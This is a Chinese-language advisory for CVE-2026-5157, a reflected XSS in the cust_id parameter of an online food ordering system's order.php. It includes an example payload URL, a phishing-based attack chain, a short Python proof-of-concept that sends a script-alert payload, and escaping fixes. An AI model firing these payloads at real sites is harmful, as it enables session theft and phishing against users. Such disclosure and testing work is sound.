CVE-2026-5157: Online Food Ordering System XSS漏洞

漏洞信息

漏洞编号

CVE-2026-5157

漏洞类型

XSS (跨站脚本)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

code-projects Online Food Ordering System

漏洞概述

code-projects Online Food Ordering System 1.0版本被发现存在一处跨站脚本（XSS）漏洞。该漏洞源于订单模块的/form/order.php文件未能正确处理用户输入的cust_id参数。由于缺乏有效的安全过滤机制，攻击者可远程利用此漏洞，通过精心构造包含恶意脚本的Payload进行注入攻击。虽然该漏洞需要一定的用户交互（UI:R）才能触发，但其无需身份认证（PR:N）且利用难度较低（AC:L），一旦成功利用，可能导致用户的完整性受损，存在中等安全风险。

技术细节

CVE-2026-5157漏洞的成因在于code-projects Online Food Ordering System在Web应用开发过程中未遵循安全编码规范。具体而言，在处理/form/order.php的请求时，应用程序直接从HTTP请求中获取cust_id参数，并将其未经消毒地嵌入到服务器响应的HTML源码中。这种信任用户输入的机制使得攻击者能够注入JavaScript代码。攻击向量为网络（AV:N），且攻击复杂度低（AC:L）。攻击者首先需要侦察到目标系统，然后构造一个包含恶意JavaScript的URL（例如：/form/order.php?cust_id=<img src=x onerror=alert(1)>）。随后，攻击者通过钓鱼邮件或其他社会工程学手段诱导拥有有效会话的受害者访问该链接。当受害者浏览器发起请求时，服务器将执行恶意脚本。由于同源策略，该脚本可以在受害者的浏览器上下文中运行，窃取Session Cookie、篡改DOM元素或执行未授权操作，从而破坏了数据的完整性（I:L）。

攻击链分析

STEP 1

1. 侦察

攻击者识别出目标正在使用code-projects Online Food Ordering System 1.0，并定位到/form/order.php接口。

STEP 2

2. 构造载荷

攻击者构造包含恶意JavaScript代码的URL，将Payload插入到cust_id参数中。

STEP 3

3. 传递链接

攻击者通过网络钓鱼或社会工程学手段，诱导目标用户点击带有恶意参数的链接。

STEP 4

4. 执行攻击

当用户访问该链接时，服务器端未过滤参数并将其返回，导致用户浏览器解析并执行恶意脚本。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-5157
import requests

def check_xss_vulnerability(target_url):
    """
    This script checks for the XSS vulnerability in cust_id parameter.
    """
    # The vulnerable endpoint
    full_url = f"{target_url}/form/order.php"
    
    # Malicious payload to test script execution
    # Using a simple alert script to verify the vulnerability
    payload = "<script>alert('CVE-2026-5157_XSS_Test');</script>"
    
    parameters = {
        "cust_id": payload
    }
    
    try:
        print(f"[+] Sending request to: {full_url}")
        response = requests.get(full_url, params=parameters, timeout=10)
        
        # Check if the payload is reflected in the response without proper encoding
        if payload in response.text:
            print("[!] Vulnerability Confirmed: The payload was reflected unfiltered in the response.")
            print("[!] Potential for Cross-Site Scripting (XSS).")
        else:
            print("[-] Vulnerability not detected or payload might be encoded.")
            
    except requests.exceptions.RequestException as e:
        print(f"[Error] An error occurred: {e}")

if __name__ == "__main__":
    # Replace with the actual target IP or domain
    target = "http://127.0.0.1"
    check_xss_vulnerability(target)

影响范围

code-projects Online Food Ordering System 1.0

防御指南

临时缓解措施

建议立即检查并修改/form/order.php文件，对cust_id参数使用htmlspecialchars()等函数进行转义处理。在官方补丁发布前，可以通过输入正则验证限制cust_id仅允许数字或特定字符格式，以阻断恶意脚本注入。同时，加强用户安全意识教育，不随意点击不明链接。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5157
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5157
3 Details https://www.cvedetails.com/cve/CVE-2026-5157/
4 VulDB https://vuldb.com/cve/CVE-2026-5157
5 Link https://code-projects.org/
6 Link https://gist.github.com/HxH404/f7f1502ffc9f2aacc936a6e8f290b6a5
7 Link https://vuldb.com/submit/776186
8 Link https://vuldb.com/vuln/354189
9 Link https://vuldb.com/vuln/354189/cti